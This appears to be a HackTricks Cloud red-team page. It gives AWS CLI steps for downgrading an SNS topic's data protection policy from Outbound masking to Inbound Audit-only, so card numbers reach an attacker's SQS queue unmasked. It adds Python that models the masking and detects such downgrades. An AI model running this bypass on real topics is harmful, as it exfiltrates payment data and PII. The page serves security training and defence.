AWS - SNS Message Data Protection Bypass via Policy Downgrade
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
If you have `sns:PutDataProtectionPolicy` on a topic, you can replace its Message Data Protection policy (a topic holds a single policy and Put overwrites it) and switch it from Deidentify/Deny to Audit-only, or otherwise drop its Outbound statements, so that sensitive values (e.g., credit card numbers) are delivered unmodified to a subscription you control.
Requirements
- Permissions on the target topic to call `sns:PutDataProtectionPolicy` (and usually `sns:Subscribe` if you want to receive the data).
- A standard SNS topic (Message Data Protection supported).
Attack Steps
- Variables

```bash
REGION=us-east-1
```

- Create a standard topic and an attacker SQS queue, and allow only this topic to send to the queue

```bash
TOPIC_ARN=$(aws sns create-topic --name ht-dlp-bypass-$(date +%s) --region $REGION --query TopicArn --output text)
Q_URL=$(aws sqs create-queue --queue-name ht-dlp-exfil-$(date +%s) --region $REGION --query QueueUrl --output text)
Q_ARN=$(aws sqs get-queue-attributes --queue-url "$Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)

# Queue policy: only this topic may SendMessage to the queue (unquoted heredoc so $Q_ARN and $TOPIC_ARN expand)
cat > /tmp/ht-q-policy.json <<JSON
{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "AllowOnlyThisTopic",
    "Effect": "Allow",
    "Principal": { "Service": "sns.amazonaws.com" },
    "Action": "sqs:SendMessage",
    "Resource": "$Q_ARN",
    "Condition": { "ArnEquals": { "aws:SourceArn": "$TOPIC_ARN" } }
  }]
}
JSON
# --attributes takes a JSON map whose Policy value is the policy document as a string; jq does the escaping
aws sqs set-queue-attributes --queue-url "$Q_URL" --region $REGION \
  --attributes "$(jq -n --arg p "$(cat /tmp/ht-q-policy.json)" '{Policy: $p}')"
```

- Attach a data protection policy that masks credit card numbers on outbound messages

```bash
cat > /tmp/ht-dlp-policy.json <<'JSON'
{
  "Name": "__ht_dlp_policy",
  "Version": "2021-06-01",
  "Statement": [{
    "Sid": "MaskCCOutbound",
    "Principal": ["*"],
    "DataDirection": "Outbound",
    "DataIdentifier": ["arn:aws:dataprotection::aws:data-identifier/CreditCardNumber"],
    "Operation": { "Deidentify": { "MaskConfig": { "MaskWithCharacter": "#" } } }
  }]
}
JSON
aws sns put-data-protection-policy --region $REGION --resource-arn "$TOPIC_ARN" --data-protection-policy "$(cat /tmp/ht-dlp-policy.json)"
```

- Subscribe the attacker queue, publish a message with a test CC number, and verify masking

```bash
SUB_ARN=$(aws sns subscribe --region $REGION --topic-arn "$TOPIC_ARN" --protocol sqs --notification-endpoint "$Q_ARN" --query SubscriptionArn --output text)
aws sns publish --region $REGION --topic-arn "$TOPIC_ARN" --message 'payment:{cc:4539894458086459}'
aws sqs receive-message --queue-url "$Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 15 --message-attribute-names All --attribute-names All
```

Expected excerpt shows masking (hashes):

```
"Message" : "payment:{cc:################}"
```
- Downgrade the policy to audit-only (no Deidentify/Deny statements affecting Outbound)

For SNS, Audit statements must be Inbound. Replacing the policy with an Audit-only Inbound statement removes the Outbound de-identification (Put overwrites the topic's single policy), so messages flow unmodified to subscribers.

```bash
cat > /tmp/ht-dlp-audit-only.json <<'JSON'
{
  "Name": "__ht_dlp_policy",
  "Version": "2021-06-01",
  "Statement": [{
    "Sid": "AuditInbound",
    "Principal": ["*"],
    "DataDirection": "Inbound",
    "DataIdentifier": ["arn:aws:dataprotection::aws:data-identifier/CreditCardNumber"],
    "Operation": { "Audit": { "SampleRate": 99, "NoFindingsDestination": {} } }
  }]
}
JSON
aws sns put-data-protection-policy --region $REGION --resource-arn "$TOPIC_ARN" --data-protection-policy "$(cat /tmp/ht-dlp-audit-only.json)"
```
- Publish the same message and verify the unmasked value is delivered

```bash
# The masked message from the earlier step is still in the queue unless it was deleted; purge so the next receive returns the new one
aws sqs purge-queue --queue-url "$Q_URL" --region $REGION
aws sns publish --region $REGION --topic-arn "$TOPIC_ARN" --message 'payment:{cc:4539894458086459}'
aws sqs receive-message --queue-url "$Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 15 --message-attribute-names All --attribute-names All
```

Expected excerpt shows the cleartext CC:

```
"Message" : "payment:{cc:4539894458086459}"
```
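What the two Put calls above change, modelled locally. The following Python is an added example, not code from the original page or from AWS: it approximates the CreditCardNumber identifier as a Luhn-valid run of 13 to 19 digits (an assumption; the managed identifier applies further rules), runs the page's test message through the Outbound Deidentify policy and then through the Audit-only policy, and adds an `is_downgrade` check that flags a replacement policy which drops every Outbound Deidentify/Deny statement. The two policies are the ones from the steps above, embedded inline.

```python
"""
Local model of an SNS data protection policy applied to an outbound message,
plus a check for the policy downgrade described on this page.
Added example, not AWS code. Card-number matching is an approximation
(assumption): a Luhn-valid run of 13-19 digits.
"""
import re

CC_IDENTIFIER = "arn:aws:dataprotection::aws:data-identifier/CreditCardNumber"
CC_RE = re.compile(r"(?<!\d)\d{13,19}(?!\d)")

# Policy from the "mask credit card numbers on outbound" step.
MASK_POLICY = {
    "Name": "__ht_dlp_policy",
    "Version": "2021-06-01",
    "Statement": [{
        "Sid": "MaskCCOutbound",
        "Principal": ["*"],
        "DataDirection": "Outbound",
        "DataIdentifier": [CC_IDENTIFIER],
        "Operation": {"Deidentify": {"MaskConfig": {"MaskWithCharacter": "#"}}},
    }],
}

# Policy from the "downgrade to audit-only" step: Inbound audit, no Outbound control.
AUDIT_ONLY_POLICY = {
    "Name": "__ht_dlp_policy",
    "Version": "2021-06-01",
    "Statement": [{
        "Sid": "AuditInbound",
        "Principal": ["*"],
        "DataDirection": "Inbound",
        "DataIdentifier": [CC_IDENTIFIER],
        "Operation": {"Audit": {"SampleRate": 99, "NoFindingsDestination": {}}},
    }],
}

MESSAGE = "payment:{cc:4539894458086459}"  # the page's test message (Luhn-valid test number)


def luhn_valid(digits: str) -> bool:
    """Luhn checksum: double every second digit from the right, subtract 9 if > 9."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_card_numbers(text: str):
    """(start, end) spans of digit runs that pass the Luhn check."""
    return [m.span() for m in CC_RE.finditer(text) if luhn_valid(m.group())]


def outbound_controls(policy: dict) -> list:
    """Statements that alter or block delivery: Outbound with Deidentify or Deny.
    Audit statements never change what a subscriber receives."""
    return [
        s for s in policy.get("Statement", [])
        if s.get("DataDirection") == "Outbound"
        and {"Deidentify", "Deny"} & set(s.get("Operation", {}))
    ]


def apply_outbound(policy: dict, message: str):
    """Model delivery of `message` under `policy`.
    Returns (delivered, body); body is None when a Deny statement drops it.
    Only the CreditCardNumber identifier is modelled."""
    body = message
    for stmt in outbound_controls(policy):
        if CC_IDENTIFIER not in stmt.get("DataIdentifier", []):
            continue
        spans = find_card_numbers(body)
        if not spans:
            continue
        op = stmt["Operation"]
        if "Deny" in op:
            return False, None
        deid = op["Deidentify"]
        if "MaskConfig" in deid:
            ch = deid["MaskConfig"].get("MaskWithCharacter", "*")  # default mask char assumed
            for start, end in reversed(spans):
                body = body[:start] + ch * (end - start) + body[end:]
        else:  # RedactConfig: the matched value is removed entirely
            for start, end in reversed(spans):
                body = body[:start] + body[end:]
    return True, body


def is_downgrade(old_policy: dict, new_policy: dict) -> bool:
    """True when replacing old_policy with new_policy drops every Outbound
    Deidentify/Deny statement, which is exactly the change in the downgrade step."""
    return bool(outbound_controls(old_policy)) and not outbound_controls(new_policy)


if __name__ == "__main__":
    print(apply_outbound(MASK_POLICY, MESSAGE))          # (True, 'payment:{cc:################}')
    print(apply_outbound(AUDIT_ONLY_POLICY, MESSAGE))    # (True, 'payment:{cc:4539894458086459}')
    print(is_downgrade(MASK_POLICY, AUDIT_ONLY_POLICY))  # True
```

Run it with `python3` to see the masked and unmasked deliveries side by side. `is_downgrade` is the defender-side mirror of the attack: the same comparison can be made between a topic's current policy (`aws sns get-data-protection-policy --resource-arn ...`) and the document submitted in a `PutDataProtectionPolicy` call, so that a replacement which silently removes Outbound controls is flagged rather than accepted.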
Impact
- Switching a topic from de-identification/deny to audit-only (or otherwise removing Outbound controls) allows PII/secrets to pass through unmodified to attacker-controlled subscriptions, enabling data exfiltration that would otherwise be masked or blocked.